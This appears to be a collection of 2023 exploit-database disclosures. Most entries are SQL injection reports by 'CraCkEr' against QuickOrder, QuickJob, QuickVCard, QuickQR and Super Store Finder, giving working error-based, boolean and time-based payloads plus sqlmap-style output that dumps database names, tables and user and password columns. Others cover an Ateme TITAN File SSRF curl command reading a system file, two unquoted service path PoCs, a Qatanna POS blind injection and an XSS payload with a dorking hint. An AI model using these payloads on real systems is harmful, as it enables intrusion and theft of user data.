<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/item/super-store-finder/3630922 │<br />│ Vendor : Super Store Finder │<br />│ Software : Super Store Finder 3.6 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />---------------------------------------------------------------------------------<br />POST /products/superstorefinder/index.php HTTP/1.1<br /><br />ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]<br />---------------------------------------------------------------------------------<br /><br />POST parameter 'products' is vulnerable to SQL Injection<br /><br />---<br />Parameter: products (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'superstor_***'<br /><br /><br />fetching tables<br /><br />[8 tables]<br />+--------------+<br />| categories_b |<br />| categories |<br />| stores_c |<br />| categories_c |<br />| stores_b |<br />| users_b |<br />| users |<br />| stores |<br />+--------------+<br /><br /><br />fetching columns for table 'users'<br /><br />[11 columns]<br />+-------------+<br />| id |<br />| username |<br />| password |<br />| firstname |<br />| lastname |<br />| facebook_id |<br />| address |<br />| email |<br />| created |<br />| modified |<br />| status |<br />+-------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickorder.by-code.com │<br />│ Vendor : bylancer │<br />│ Software : QuickOrder 6.3.7 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=1') OR 02445=2445 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickordercode_**'<br /><br /><br />fetching tables<br /><br />[39 tables]<br />+-------------------------+<br />| qr_orders |<br />| qr_order_items |<br />| qr_blog_comment |<br />| qr_payments |<br />| qr_menu_variants |<br />| qr_options |<br />| qr_time_zones |<br />| qr_countries |<br />| qr_restaurant |<br />| qr_blog_categories |<br />| qr_logs |<br />| qr_image_menu |<br />| qr_balance |<br />| qr_blog |<br />| qr_menu |<br />| qr_user |<br />| qr_pages |<br />| qr_menu_extras |<br />| qr_taxes |<br />| qr_upgrades |<br />| qr_usergroups |<br />| qr_faq_entries |<br />| qr_transaction |<br />| qr_restaurant_options |<br />| qr_languages |<br />| qr_admins |<br />| qr_allergies |<br />| qr_user_options |<br />| qr_order_item_extras |<br />| qr_subscriptions |<br />| qr_menu_variant_options |<br />| qr_plans |<br />| qr_testimonials |<br />| qr_plan_options |<br />| qr_catagory_main |<br />| qr_currencies |<br />| qr_restaurant_view |<br />| qr_waiter_call |<br />| qr_blog_cat_relation |<br />+-------------------------+<br /> <br /><br /><br />[-] Done<br /></code></pre>
<pre><code><br />Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.9.12.4<br /> 3.9.11.0<br /> 3.9.9.2<br /> 3.9.8.0<br /><br />Summary: TITAN File is a multi-codec/format video transcoding<br />software, for mezzanine, STB and ABR VOD, PostProduction, Playout<br />and Archive applications. TITAN File is based on ATEME 5th Generation<br />STREAM compression engine and delivers the highest video quality<br />at minimum bitrates with accelerated parallel processing.<br /><br />Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability<br />exists in the Titan File video transcoding software. The application<br />parses user supplied data in the job callback url GET parameter. Since<br />no validation is carried out on the parameter, an attacker can specify<br />an external domain and force the application to make an HTTP/DNS/File<br />request to an arbitrary destination. This can be used by an external<br />attacker for example to bypass firewalls and initiate a service, file<br />and network enumeration on the internal network through the affected<br />application.<br /><br />Tested on: Microsoft Windows<br /> NodeJS<br /> Ateme KFE Software<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5781<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php<br /><br /><br />22.04.2023<br /><br />--<br /><br /><br />curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \<br /> -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \<br /> -H "User-Agent: sunee-mode" \<br /> "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"<br /><br />Call to file://C:\\windows\\system.ini returned 0<br /><br />---<br /><br />HTTP from Server<br />----------------<br /><br />POST / HTTP/1.1<br />Host: ssrftest.zeroscience.mk<br />Accept: */*<br />Content-Type: application/xml<br />Content-Length: 192<br /><br /><?xml version='1.0' encoding='UTF-8' ?><br /><update><br /> <id>0000</id><br /> <name>dummy test job</name><br /> <status>aborted</status><br /> <progress>50</progress><br /> <message>message</message><br /></update><br /></code></pre>
<pre><code>[#] Exploit Title: Qatanna POS Software 1.0 - Blind SQL Injection<br />[#] Exploit Date: May 07, 2023.<br />[#] CVSS 3.1: 8.8 (High)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br />[#] Application Name: Qatanna POS Software<br />[#] Application Version: 1.0<br />[#] Link: https://www.codester.com/items/42053/qatanna-pos-software<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]/update_expense.php?id=[Blind-Injection]<br /><br /><br />[#] 3xample:<br /><br />[path]/update_expense.php?id=8' AND 100=100 AND 'h4ck3r'='h4ck3r<br />--> True<br />[path]/update_expense.php?id=8' AND 100=100 AND 'h4ck3r'='Faisal<br />--> False<br /><br /><br />[#] Note:<br />- This vulnerability does not need admin privileges. A normal user can exploit it.<br /></code></pre>
<pre><code># Exploit Title: Game Jackal Server v5 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.allradiosoft.ru<br /># Software Link: https://www.allradiosoft.ru/en/ss/index.htm<br /># Version: 5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36166<br /><br />#PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto<br /><br />C:\Users>sc qc GJServiceV5<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: GJServiceV5<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Game Jackal Server v5<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code># Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.avg.com<br /># Software Link: https://www.avg.com/en-ww/homepage#pc<br /># Version: 7.5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36167<br /><br />#PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto<br /><br />C:\Users>sc qc "AVG Anti-Spyware Guard"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: AVG Anti-Spyware Guard<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : AVG Anti-Spyware Guard<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickqr.by-code.com/ │<br />│ Vendor : Bylancer │<br />│ Software : QuickQR 6.3.7 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 05923=5923 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickqrmenu_**'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickjob.bylancer.com │<br />│ Vendor : Bylancer │<br />│ Software : QuickJob 6.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /listing<br /><br />https://website/job-seekers?keywords=[SQLI]&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=[SQLI]<br /><br /><br />GET parameter 'keywords' is vulnerable to SQL Injection<br /><br />---<br />Parameter: keywords (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: keywords=' AND 08186=8186 OR '04586'='4586&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: keywords='XOR(IF(now()=sysdate(),SLEEP(9),0))XOR'Z&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=<br />---<br /><br /><br />GET parameter 'gender' is vulnerable to SQL Injection<br /><br />---<br />Parameter: gender (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickjob_**'<br /><br /><br />fetching tables<br /><br />[48 tables]<br />+---------------------------+<br />| job_logs |<br />| job_blog |<br />| job_currencies |<br />| job_user |<br />| job_emailq |<br />| job_custom_fields |<br />| job_notification |<br />| job_reviews |<br />| job_testimonials |<br />| job_user_applied |<br />| job_countries |<br />| job_product_resubmit |<br />| job_category_translation |<br />| job_favads |<br />| job_experiences |<br />| job_blog_categories |<br />| job_faq_entries |<br />| job_subadmin1 |<br />| job_cities |<br />| job_push_notification |<br />| job_product |<br />| job_upgrades |<br />| job_catagory_sub |<br />| job_messages |<br />| job_catagory_main |<br />| job_firebase_device_token |<br />| job_time_zones |<br />| job_blog_comment |<br />| job_custom_options |<br />| job_payments |<br />| job_adsense |<br />| job_blog_cat_relation |<br />| job_languages |<br />| job_custom_data |<br />| job_pages |<br />| job_companies |<br />| job_balance |<br />| job_login_attempts |<br />| job_subscriptions |<br />| job_fav_users |<br />| job_admins |<br />| job_resumes |<br />| job_product_type |<br />| job_salary_type |<br />| job_transaction |<br />| job_options |<br />| job_usergroups |<br />| job_subadmin2 |<br />+---------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://quickvcard.by-code.com/ │<br />│ Vendor : bylancer │<br />│ Software : QuickVCard 2.1 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 02449=2449 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(5),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickvcardcode_**'<br /><br /><br />fetching tables<br /><br />[27 tables]<br />+----------------------+<br />| vc_upgrades |<br />| vc_languages |<br />| vc_balance |<br />| vc_transaction |<br />| vc_vcard_options |<br />| vc_payments |<br />| vc_time_zones |<br />| vc_user |<br />| vc_plans |<br />| vc_user_options |<br />| vc_faq_entries |<br />| vc_admins |<br />| vc_vcards |<br />| vc_blog_cat_relation |<br />| vc_vcard_view |<br />| vc_blog_categories |<br />| vc_testimonials |<br />| vc_blog |<br />| vc_subscriber |<br />| vc_blog_comment |<br />| vc_logs |<br />| vc_countries |<br />| vc_taxes |<br />| vc_options |<br />| vc_currencies |<br />| vc_plan_options |<br />| vc_pages |<br />+----------------------+<br /><br /><br />fetching columns for Table: vc_user<br /><br />[47 columns]<br />+----------------+<br />| id |<br />| group_id |<br />| username |<br />| user_type |<br />| balance |<br />| password_hash |<br />| forgot |<br />| confirm |<br />| email |<br />| status |<br />| view |<br />| created_at |<br />| updated_at |<br />| name |<br />| tagline |<br />| description |<br />| dob |<br />| salary_min |<br />| salary_max |<br />| category |<br />| subcategory |<br />| website |<br />| sex |<br />| phone |<br />| postcode |<br />| address |<br />| country |<br />| city |<br />| city_code |<br />| state_code |<br />| country_code |<br />| image |<br />| lastactive |<br />| facebook |<br />| twitter |<br />| googleplus |<br />| instagram |<br />| linkedin |<br />| youtube |<br />| oauth_provider |<br />| oauth_uid |<br />| oauth_link |<br />| online |<br />| notify |<br />| notify_cat |<br />| currency |<br />| menu_layout |<br />+----------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : virtual freer v1.57 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://sourceforge.net/projects/virtualfreer/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E<br /><br />[+] http://shopazcamultrair/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>